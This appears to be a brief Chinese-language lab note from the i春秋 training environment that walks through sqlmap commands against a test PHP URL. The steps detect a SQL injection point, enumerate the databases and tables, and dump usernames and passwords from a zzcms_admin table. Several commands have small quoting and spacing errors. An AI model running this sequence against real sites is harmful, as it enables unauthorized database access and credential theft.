用的i春秋环境
sqlmap目录结构
首先得找到一个注入点
对注入点进行检测
python sqlmap.py -u http://www.test.com/Art_Show.php?id=2
获取所有数据库名称
python sqlmap.py -u "http://www.test.com/Art_Show.php?id=2" --dbs
获取当前所在数据库
python sqlmap.py -u "http://www.test.com/Art_Show.php?id=2 --current-db
-current-db没空格通过实例获取当前数据库名为 mys
获取当前数据库内所有表名称
python sqlmap.py -u "http://www.test.com/Art_Show.php?id=2"-D mys --tables
获取 admin 表内的列名
python sqlmap.py -u "http://www.test.com/Art_Show.php?id=2"-D mys -T zzcms_admin --columns
获取 name 和 password 内的账户密码
python sqlmap.py -u"http://www.test.com/Art_Show.php?id=2"-D mys -T zzcms_admin -C name,password --dump